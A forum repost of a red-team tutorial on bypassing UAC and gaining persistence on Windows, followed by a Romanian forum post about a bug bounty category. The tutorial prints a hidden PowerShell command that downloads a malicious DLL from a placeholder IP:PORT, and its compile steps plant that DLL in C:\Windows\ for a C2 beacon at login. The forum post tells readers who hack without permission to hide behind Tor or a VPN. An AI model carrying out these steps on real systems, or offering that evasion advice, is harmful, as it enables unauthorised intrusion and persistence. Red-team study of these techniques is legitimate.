Leaderboard

assume-breach Jan 20 Home Grown Red Team: Bypassing Applocker, UAC, and Getting Administrative Persistence Welcome back! In my previous post, I showed how we can bypass default Applocker rules using LNK files to get a Havoc beacon. In this installment, we’re going to bypass UAC and gain administrative persistence on a target without dropping EXEs to disk. Pretty cool, right? Getting Started If you haven’t read my previous post, you can find it here: Bypassing Applocker Using LNK Files. That post is going to show you how to set up your Powershell scripts, LNK file and so forth for initial access to the target. Since we still have access to our target, we’re going to start where we ended in our last article. Here’s the scenario: We have an administrative beacon in medium integrity through Havoc C2. You’ll notice that the process is Powershell. If we had used process injection in our shellcode dropper, we would have migrated to a different process like Explorer.exe or ApplicationFrameHost.exe (just something to think about). Running a “whoami” we see that our user, david, is part of the administrators group. In order for our persistence method to work, we need local admin. The reason being that we need access to “C:\Windows\” and this isn’t accessible to domain users or administrators unless we are in a high integrity beacon/process. So since this user is an admin, we can perform a UAC bypass. For this task, I prefer to use my own tool, HighBorn. HighBorn utilizes the Windows mock directory vulnerability to side load a DLL and execute it in high integrity. Using A UAC Bypass To Perform Administrative Actions A typical UAC Bypass is performed to get a high integrity beacon back to a C2. However, we can use HighBorn to perform administrative tasks on execution instead of getting a high integrity beacon. Let’s discuss the typical UAC Bypass to get a beacon back to Havoc. This is the usual workflow: Target downloads malicious EXE . 2. We run HighBorn in memory using inline-execute. 3. HighBorn performs the UAC Bypass and calls the EXE in high integrity. 4. We get a high integrity beacon. Since we are bypassing Applocker protections, we don’t have a dropper on disk. Remember, our beacon is running through a Powershell process. The UAC Bypass performs administrative code execution so we can tailor this to our needs. Since our need for this POC is persistence, we can change our execution from calling a malicious EXE to downloading a malicious DLL. DLL Side Loading For Persistence I’ve seen a few posts on this, mainly on LinkedIn, but there is a pretty popular DLL side loading vulnerability in Windows File Explorer. If you craft a malicious DLL and name it cscapi.dll, you can place it in C:\Windows\ and it will get executed when the user logs in. The caveat to this is that you must have local admin privileges to gain access to C:\Windows\. So let’s begin by creating a malicious DLL. Creating The Malicious DLL To create a malicious DLL, I prefer to use my own tool, Harriet. We choose option 2 to create our DLL. We then choose option 1 (the only option for now) and then we input all of our values. I chose to inject into Explorer.exe (you might want to change this process if you’re on a real pentest) and I named my DLL appropriately for the exploit. Modifying HighBorn.cs For Administrative Actions Now we need to craft a command to call out to cscapi.dll and download it into C:\Windows\. This is where HighBorn comes in. I navigate to the HighBorn folder and edit the HighBorn.c file. As you can see from the screenshot, this is a very simple DLL. We can use a easy Powershell command to download our cscapi.dll file into the Windows folder. powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ However, if we try to compile this, we get escape sequence errors. Let’s encode our command into Base64 using Powershell. $str= “powershell -Sta -Nop -Window Hidden iwr -Uri ‘http://IP:PORT/cscapi.dll' -Outfile ‘C:\Windows\cscapi.dll’ [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str)) Now we should have a good Base64 string. Let’s add it to HighBorn.c file. We then compile it per the command in the ReadMe.md file in the HighBorn folder. x86_64-w64-mingw32-gcc -shared -o secur32.dll HighBorn.c -lcomctl32 -Wl, — subsystem,windows Now we have a secur32.dll file. In the HighBorn.cs file, we modify the exploit to put our IP and port to pull secur32.dll. Then we can compile HighBorn.exe with this command. mcs HighBorn.cs /out:HighBorn.exe We host secur32.dll and run our command in Havoc. On our python server, we see it pull secur32.dll and then it pulls our cscapi.dll file! Moving to our Windows folder on the target, we see that it has our DLL in place. Now remember, our cscapi.dll is a malicious DLL that will inject shellcode into Explorer.exe on login. Let’s reboot the target and see if we get a shellback. If all goes well, we should get a beacon in the Explorer.exe process on Havoc. And as user david logs in, we have our beacon! Pretty cool persistence technique! The biggest con to this technique is that you need admin privileges. However, if you can crack an admin password you can perform this technique on any user’s system for persistence on multiple workstations in the environment without having to drop an EXE to disk. Hopefully you found this article helpful or at least interesting. If you like my content you can follow me on here or on Twitter @assume_breach Sursa: https://assume-breach.medium.com/home-grown-red-team-bypassing-applocker-uac-and-getting-administrative-persistence-88b85c81343e

RST e o comunitate cu foarte multi oameni pasionati de descoperirea unor probleme de securitate, in special in aplicatiile web. Din moment ce sunt multe persoane carora le face placere sa caute probleme de securitate, de ce sa o faca gratis si nu pentru bani? Bug Bounty Bug Bounty este un program de rasplatire a pasionatilor de securitate IT care raporteaza in mod responsabil o vulnerabilitate, folosit de mai multe companii pentru prevenirea problemelor care pot sa apara prin exploatarea vulnerabilitatilor descoperite in propriile servicii de catre utilizatorii acestora. Exista cateva companii mari (Google, Facebook...) care au decis sa porneasca un astfel de program. Rasplata poate fi atat un premiu in bani, dar si memtionarea celor care le-au descoperit intr-un "Hall of fame", sau alte premii: tricouri, licente pentru produse software etc. Vom mentine o lista cu aceste site-uri aici: https://rstforums.com/forum/67995-informatii-despre-programele-bug-bounty.rst Daca aveti informatii despre noi site-uri inscrise in program sau despre cele deja existente postati acolo pentru a mentine lista actualizata. Pentru pasionati, avantajul il reprezinta premiile pe care le pot primi prin raportarea acestor vulnerabilitati, iar pentru companii avantajul este repararea respectivelor probleme de securitate. Dar daca am gasit o problema intr-un site care nu are un program Bug Bounty? Desigur, puteti cauta probleme de securitate si in site-uri care nu au un astfel de program, insa va indreptati spre ilegalitate. Nu toate companiile considera un privilegiu descoperirea si raportarea unei probleme de securitate, astfel, chiar daca raportati o problema gasita, puteti avea probleme legale, in special daca va pasioneaza site-uri mari, guvernamentale: NASA si altele... Insa de ce sa riscati inchisoarea cand puteti fi rasplatiti pentru raportarea unei vulnerabilitati? Daca inca doriti sa va riscati libertatea, cel putin faceti-o in mod profesionist: Tor, VPN sau alte masuri de protectie si aveti mare grija cand/cum/unde "raportati" problema descoperita! Ce este aceasta categorie? Categoria este destinata persoanelor care descopera probleme de securitate in site-uri cu un program bug bounty. In cazul in care problema este descoperita intr-un serviciu care nu ofera rasplata pentru raportarea vulnerabilitatilor, detaliile (de la informatii minime la full disclosure) se pot posta in categoria ShowOff. Aici se vor posta problemele descoperite in aceste site-uri cat si premiile primite sau alte informatii care ii pot ajuta si incuraja pe altii sa se implice in astfel de activitati. PS: Am mutat doar cateva topicuri aici de la ShowOff, ca exemplu, vom muta aici topicurile de la ShowOff care se incadreaza in aceasta categorie. Imi puteti trimite PM cu topicuri specifice pentru a fi mutate aici.